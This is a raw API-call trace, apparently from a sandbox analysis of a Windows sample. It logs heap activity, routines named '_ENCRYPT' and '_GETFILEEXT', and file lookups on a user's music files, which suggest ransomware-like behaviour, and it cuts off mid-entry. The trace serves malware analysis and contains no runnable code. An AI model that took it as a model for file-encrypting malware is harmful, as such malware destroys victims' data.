[0186.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0186.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0186.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0186.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0186.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0186.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0186.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0186.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0186.851] FreeLibrary (hLibModule=0x75990000) returned 1 [0186.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0186.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0186.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0186.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0186.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0186.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0186.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0186.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0186.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0186.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0186.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0186.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0186.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0186.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0186.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0186.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0186.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0186.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0186.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0186.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0186.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0186.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0186.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0186.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0186.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0186.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0186.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0186.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0186.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0186.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0186.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0186.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0186.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0186.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0186.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0186.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0186.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0186.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0186.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c00 | out: hHeap=0x8a0000) returned 1 [0186.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0186.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0186.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0186.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0186.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0186.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0186.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0186.853] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0186.897] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0186.897] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0186.897] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0186.897] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0186.898] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0186.898] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0186.898] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0186.898] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0186.898] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0186.898] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0186.898] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0186.898] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 1 [0186.898] TranslateMessage (lpMsg=0x87f3fc) returned 0 [0186.898] DispatchMessageW (lpMsg=0x87f3fc) returned 0x0 [0186.898] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0186.898] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0186.898] Shell_NotifyIconW (dwMessage=0x1, lpData=0x87ea98) returned 1 [0186.900] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0186.900] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0186.900] KillTimer (hWnd=0x1014c, uIDEvent=0x1) returned 1 [0186.900] SetTimer (hWnd=0x1014c, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0186.900] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0186.900] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0186.900] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0186.900] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0186.900] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0186.900] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0186.901] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0186.901] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0186.901] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0186.901] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0186.901] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0186.901] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0186.901] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0186.901] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0186.901] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0186.901] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0186.901] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0186.901] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0186.901] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0186.901] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0186.901] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0186.901] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0186.901] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0186.901] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0186.901] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0186.901] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0186.901] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0186.901] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0186.901] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0186.901] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0186.901] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0186.901] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0186.902] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0186.902] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0186.902] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0186.902] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0186.902] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0186.902] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0186.902] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0186.902] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0186.902] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0186.902] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0186.902] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0186.902] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0186.902] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0186.902] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0186.902] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0186.902] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0186.902] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd8d0 [0186.902] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bd8d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0186.902] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0186.902] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0186.902] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0186.903] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0186.903] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de830 [0186.903] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0186.903] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0186.903] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0186.903] CloseHandle (hObject=0x138) returned 1 [0186.903] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0186.903] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0186.903] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0186.903] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0186.903] FreeLibrary (hLibModule=0x75990000) returned 1 [0186.903] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0186.903] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0186.903] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0186.903] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0186.903] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0186.903] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0186.903] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0186.903] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0186.903] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0186.903] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0186.903] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0186.903] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0186.904] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0186.904] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0186.904] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0186.904] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0186.904] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0186.904] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0186.904] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0186.904] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0186.904] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0186.904] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0186.904] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0186.904] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0186.904] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0186.904] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0186.904] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0186.904] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0186.904] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0186.904] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0186.904] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0186.904] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0186.904] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0186.904] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0186.904] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\kDBYwX3doPBMqwfNV.m4a", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe53d4760, ftCreationTime.dwHighDateTime=0x1d5e451, ftLastAccessTime.dwLowDateTime=0x2c837c60, ftLastAccessTime.dwHighDateTime=0x1d5d7d8, ftLastWriteTime.dwLowDateTime=0x2c837c60, ftLastWriteTime.dwHighDateTime=0x1d5d7d8, nFileSizeHigh=0x0, nFileSizeLow=0x3928, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="kDBYwX3doPBMqwfNV.m4a", cAlternateFileName="KDBYWX~1.M4A")) returned 0x90add8 [0186.906] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0186.906] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0186.906] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\kDBYwX3doPBMqwfNV.m4a", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe53d4760, ftCreationTime.dwHighDateTime=0x1d5e451, ftLastAccessTime.dwLowDateTime=0x2c837c60, ftLastAccessTime.dwHighDateTime=0x1d5d7d8, ftLastWriteTime.dwLowDateTime=0x2c837c60, ftLastWriteTime.dwHighDateTime=0x1d5d7d8, nFileSizeHigh=0x0, nFileSizeLow=0x3928, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="kDBYwX3doPBMqwfNV.m4a", cAlternateFileName="KDBYWX~1.M4A")) returned 0x90add8 [0186.906] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0186.906] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0186.906] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\kDBYwX3doPBMqwfNV.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.906] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\kDBYwX3doPBMqwfNV.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.906] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\kDBYwX3doPBMqwfNV.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.906] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\kDBYwX3doPBMqwfNV.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.906] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\kDBYwX3doPBMqwfNV.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.907] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\kDBYwX3doPBMqwfNV.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.907] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\kDBYwX3doPBMqwfNV.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.907] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\kDBYwX3doPBMqwfNV.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.907] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\kDBYwX3doPBMqwfNV.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.907] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\kDBYwX3doPBMqwfNV.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.907] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\kDBYwX3doPBMqwfNV.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.907] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\kDBYwX3doPBMqwfNV.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.907] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\kDBYwX3doPBMqwfNV.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.907] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\kDBYwX3doPBMqwfNV.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.907] CompareStringW (Locale=0x400, 